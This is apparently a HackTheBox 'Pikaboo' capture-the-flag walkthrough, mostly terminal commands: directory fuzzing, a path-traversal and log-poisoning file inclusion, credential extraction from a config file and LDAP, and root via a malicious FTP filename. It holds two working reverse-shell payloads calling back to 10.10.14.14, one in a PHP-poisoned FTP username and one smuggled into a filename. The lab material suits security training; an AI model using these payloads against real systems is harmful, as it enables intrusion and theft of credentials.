HackThebox – Pikaboo

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A -v -T4 -Pn 10.10.10.249

http://10.10.10.249/

┌──(rootkali)-[/home/kali/Downloads]

└─# wfuzz -u http://10.10.10.249/admin../FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 –hc 404,401,403

So in this result, I have got one interesting directory which is server-status.

When I enter this directory in the browser I have got some interesting information (shown below image).

http://10.10.10.249/admin../server-status/

http://10.10.10.249/admin../admin_staging/

Now we are trying for /var/log/vsftpd.log.

http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 4444

┌──(rootkali)-[/home/kali/Downloads]

└─# ftp 10.10.10.249

Name (10.10.10.249:kali): <?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.14/4444 0>&1′”); ?>

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log

www-data@pikaboo:/var/www/html/admin_staging$ cd /home

www-data@pikaboo:/home$ ls

www-data@pikaboo:/home$ cd pwnmeow

www-data@pikaboo:/home/pwnmeow$ ls

www-data@pikaboo:/home/pwnmeow$ cat user.txt

www-data@pikaboo:/home/pwnmeow$ cd ..

www-data@pikaboo:/home$ cd ..

www-data@pikaboo:/$ ls

www-data@pikaboo:/$ cd opt

www-data@pikaboo:/opt$ ls

www-data@pikaboo:/opt$ cd pokeapi

www-data@pikaboo:/opt/pokeapi$ ls

www-data@pikaboo:/opt/pokeapi$ grep -iRl ‘password’

Further analysis of this file I got one interesting thing which is ldap and which get some credentials using ldap.

www-data@pikaboo:/opt/pokeapi$ cat config/settings.py

“PASSWORD”: “J~42%W?PFHl]g”

www-data@pikaboo:/opt/pokeapi$ ldapsearch -x -LLL -h 127.0.0.1 -D ‘cn=binduser,ou=users,dc=pikaboo,dc=htb’ -w ‘J~42%W?PFHl]g’ -b ‘dc=pikaboo,dc=htb’

homeDirectory: /home/pwnmeow

userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==

decode the same

_G0tT4_C4tcH_’3m_4lL!_

https://www.base64decode.org/

┌──(rootkali)-[/home/kali/Downloads]

└─# ftp 10.10.10.249

username pwnmeow

password _G0tT4_C4tcH_’3m_4lL!_

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvp 4040

ftp> cd versions

ftp> put “|python3 -c ‘import os,pty,socket;s=socket.socket();s.connect((“\”10.10.14.14\””,4040));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(“\”sh\””)’;.csv”

Now wait for 1 -4 min to get the root shell.